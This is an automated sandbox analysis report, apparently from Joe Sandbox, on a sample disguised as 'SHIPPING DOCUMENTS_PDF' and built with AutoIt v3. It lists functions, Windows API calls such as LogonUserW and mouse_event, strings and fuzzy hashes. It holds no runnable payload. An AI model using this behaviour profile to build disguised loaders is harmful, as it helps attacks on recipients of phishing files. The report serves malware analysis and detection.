                                                                                    • Instruction ID: 1b2a568df5a99674a2f5f99b3a4cf81dc90baa34e49930d4ffa182a4e62b1d93
                                                                                    • Opcode Fuzzy Hash: 5cae04e1c8fb1ab7c28221350c37be53e45e677a30534319443fbd0c9a0742bd
                                                                                    • Instruction Fuzzy Hash: 01E08631015911EFE7212B20EC04D73BBE9EF04310714C86EF46681430DB215C90DB10
                                                                                    Function 00B7A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B78D57,?,?,?,00000001), ref: 00B7A15A
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B7A163
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: d4fac1d5097ccf6fa3581be1ef32fc67adf02316bfaea93e3d09c5cc3bef95bf
                                                                                    • Instruction ID: 2584ae5bdf913aa86908147b3c88ef632a6baba9f28e9309ba3ac1ee7ed2f7ef
                                                                                    • Opcode Fuzzy Hash: d4fac1d5097ccf6fa3581be1ef32fc67adf02316bfaea93e3d09c5cc3bef95bf
                                                                                    • Instruction Fuzzy Hash: 40B0923105920AABCA002B95EC19BA8BF68EB44AB2F418022F60E86060EF6254508A99
                                                                                    Function 00B7F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 79542cdf30509934ddf3b92c0b137585df5b45b2b333af8b6d80470ca69fc938
                                                                                    • Instruction ID: 12f1c9f3d00c3ecbcc202e0f586698c30ad6fefdce1a41a01726d3ba3cc1bdd4
                                                                                    • Opcode Fuzzy Hash: 79542cdf30509934ddf3b92c0b137585df5b45b2b333af8b6d80470ca69fc938
                                                                                    • Instruction Fuzzy Hash: 2E320522D69F424DD7239634D872335A289AFB73C5F15D737F82ABA9A5EF28C4834104
                                                                                    Function 00B8242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b709bfff5e3ec7d0f6bbc5a3db7d4964b56b49e30ee1a707274cca57882bb1f2
                                                                                    • Instruction ID: e325feccdce3a167206744b8a8a2a9410567002dec514bf02e9b0f681019771a
                                                                                    • Opcode Fuzzy Hash: b709bfff5e3ec7d0f6bbc5a3db7d4964b56b49e30ee1a707274cca57882bb1f2
                                                                                    • Instruction Fuzzy Hash: 26B10330D2AF804DD323A6398871336B69CAFBB2C5F52D71BFC1675D62EB2195834241
                                                                                    Function 00BB8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 00BB889B
                                                                                      • Part of subcall function 00B7520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BB8F6E,00000000,?,?,?,?,00BB911F,00000000,?), ref: 00B75213
                                                                                      • Part of subcall function 00B7520A: __aulldiv.LIBCMT ref: 00B75233
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    • Opcode ID: 9ea3f9559c26d80c468621feb7cc531d27ae8b8ac685bab1d660711360dfca5b
                                                                                    • Instruction ID: 985e2fc62efd489d4d664fbb590a9031701ab4e65bbceebf7b2906d2664284ca
                                                                                    • Opcode Fuzzy Hash: 9ea3f9559c26d80c468621feb7cc531d27ae8b8ac685bab1d660711360dfca5b
                                                                                    • Instruction Fuzzy Hash: BD21B4726355108BC729CF25D841BA6B3E5EFA5311B688E6CD0F5CB2D0CA74B905CB54
                                                                                    Function 00BB4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BB4C4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: 28d983e9e5f1ab3b0820d15acd5e755bbfebb5f1a781a0985ddf5b7cdfc75c04
                                                                                    • Instruction ID: 92958ad8d03f6777f78cb57c3f8bed4b8b1504fbe9d3f4e4b498aac21c7dcab7
                                                                                    • Opcode Fuzzy Hash: 28d983e9e5f1ab3b0820d15acd5e755bbfebb5f1a781a0985ddf5b7cdfc75c04
                                                                                    • Instruction Fuzzy Hash: ECD09E9516A61A7BED6C0B209E1FFFA5AC8F340F96FD495C976028A0C3EEE09C445131
                                                                                    Function 00BA87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BA8389), ref: 00BA87D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LogonUser
                                                                                    • String ID:
                                                                                    • API String ID: 1244722697-0
                                                                                    • Opcode ID: de5b10b6caec9397273b8378b8170b0d8099b89fb3d83ba1cd7a43b7d6dc2a17
                                                                                    • Instruction ID: 32a799f27d911051d639dc5100bf0ad7b0e816b3233fbda4b2517916f45fb872
                                                                                    • Opcode Fuzzy Hash: de5b10b6caec9397273b8378b8170b0d8099b89fb3d83ba1cd7a43b7d6dc2a17
                                                                                    • Instruction Fuzzy Hash: 2CD05E3226450EABEF018EA4DC01EBE3B69EB04B01F408111FE16C61A1C775D935AB60
                                                                                    Function 00B7A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B7A12A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: cca3169ee5d9d4dcf72a566438e974aa8594e39b53ad91a64a7b93fc7464eb7d
                                                                                    • Instruction ID: be1d70e7357b9cf8852dec30238f5a4d460c744870e985a17fcbe6ab61f12366
                                                                                    • Opcode Fuzzy Hash: cca3169ee5d9d4dcf72a566438e974aa8594e39b53ad91a64a7b93fc7464eb7d
                                                                                    • Instruction Fuzzy Hash: 0AA0123000410DA7CA001B45EC04454BF5CD6001A07004021F40D410219B3254104584
                                                                                    Function 00B68808 Relevance: .6, Instructions: 590COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c446f53b08d84fa4e82cbb76f0c6b6d924838729dac22bc74d39ebd1cff9d299
                                                                                    • Instruction ID: 9f2cf382c96c99471667ba67928557e91acd16141424dfc809957550e177d5ff
                                                                                    • Opcode Fuzzy Hash: c446f53b08d84fa4e82cbb76f0c6b6d924838729dac22bc74d39ebd1cff9d299
                                                                                    • Instruction Fuzzy Hash: 9E223730508606CBDF388AA4C4D477D77E1FF42344F2882EBDA569B592DB789E91CB81
                                                                                    Function 00B721C5 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction ID: 14973e1bfa812320dc693cb107ed92112594c00c3d681847bd641e9a48dd7f91
                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction Fuzzy Hash: B0C185322051930ADF2D473D847503EFAE19EA27B131A87EDD8BBDB1D5EE20C965D620
                                                                                    Function 00B725FA Relevance: .3, Instructions: 341COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction ID: 24dc4dfc989a72fb6be43480d7d6974a2022f7467a4fb9711f3c4bc231c4de30
                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction Fuzzy Hash: 73C185322051930ADF2D473EC47513EBAE19EA27B131A87EDD4BBDB1D5EE20C925D620
                                                                                    Function 00B71D90 Relevance: .3, Instructions: 331COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                    • Instruction ID: a15f3a57d921dceb8336184b966e08a16e30fe6b09ba0f21433a40dfa45c6ad4
                                                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                    • Instruction Fuzzy Hash: 92C165322051930ADF2D463DC47513EBAE19EA27B131A8BEDD4BBDB1D4EE10C965DA30
                                                                                    Function 00B71978 Relevance: .3, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: c6b82ca1cf05a7471c543d14db86c40b50865be8e2ded7f27863ea2399583739
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction Fuzzy Hash: D8C1733220519309DF2D463D847513EBAE1DEA27B131A9BEDD4BBDB1C4EE20C965DA30
                                                                                    Function 00BC7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BC785B
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BC786D
                                                                                    • DestroyWindow.USER32 ref: 00BC787B
                                                                                    • GetDesktopWindow.USER32 ref: 00BC7895
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BC789C
                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BC79DD
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BC79ED
                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A35
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00BC7A41
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BC7A7B
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A9D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AB0
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7ABB
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BC7AC4
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AD3
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BC7ADC
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AE3
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BC7AEE
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7B00
                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BE2CAC,00000000), ref: 00BC7B16
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BC7B26
                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BC7B4C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BC7B6B
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7B8D
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7D7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                                                                    • Instruction ID: ba41fcd744fa0d64080f7f11bf7b8f0b048aa7b63ec934511768fd292f4f3774
                                                                                    • Opcode Fuzzy Hash: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                                                                    • Instruction Fuzzy Hash: 12026A71900115EFDB14DFA4CC99EAEBBB9FB49310F1481A9F916AB2A0DB709D01CF60
                                                                                    Function 00BD356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,00BDF910), ref: 00BD3627
                                                                                    • IsWindowVisible.USER32(?), ref: 00BD364B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                    • API String ID: 4105515805-45149045
                                                                                    • Opcode ID: 34835623f42b29490abe5456953112150d05de53df162b130804800585e392c3
                                                                                    • Instruction ID: 1203d0394c2abd8baa39a332a360c0a21b234d7abca3e99a4e9f54411ee93462
                                                                                    • Opcode Fuzzy Hash: 34835623f42b29490abe5456953112150d05de53df162b130804800585e392c3
                                                                                    • Instruction Fuzzy Hash: DCD15E702187019BCA04EF10C456A6EB7E1EF55B54F1484EAF8965B3E3EB31DE0ACB52
                                                                                    Function 00BDA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00BDA630
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00BDA661
                                                                                    • GetSysColor.USER32(0000000F), ref: 00BDA66D
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00BDA687
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00BDA696
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA6C1
                                                                                    • GetSysColor.USER32(00000010), ref: 00BDA6C9
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00BDA6D0
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00BDA6DF
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BDA6E6
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00BDA731
                                                                                    • FillRect.USER32(?,?,00000000), ref: 00BDA763
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDA78E
                                                                                      • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000012), ref: 00BDA903
                                                                                      • Part of subcall function 00BDA8CA: SetTextColor.GDI32(?,?), ref: 00BDA907
                                                                                      • Part of subcall function 00BDA8CA: GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                                                                      • Part of subcall function 00BDA8CA: GetSysColor.USER32(0000000F), ref: 00BDA928
                                                                                      • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000011), ref: 00BDA945
                                                                                      • Part of subcall function 00BDA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                                                                      • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,00000000), ref: 00BDA964
                                                                                      • Part of subcall function 00BDA8CA: SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                                                                      • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,?), ref: 00BDA97A
                                                                                      • Part of subcall function 00BDA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                                                                      • Part of subcall function 00BDA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
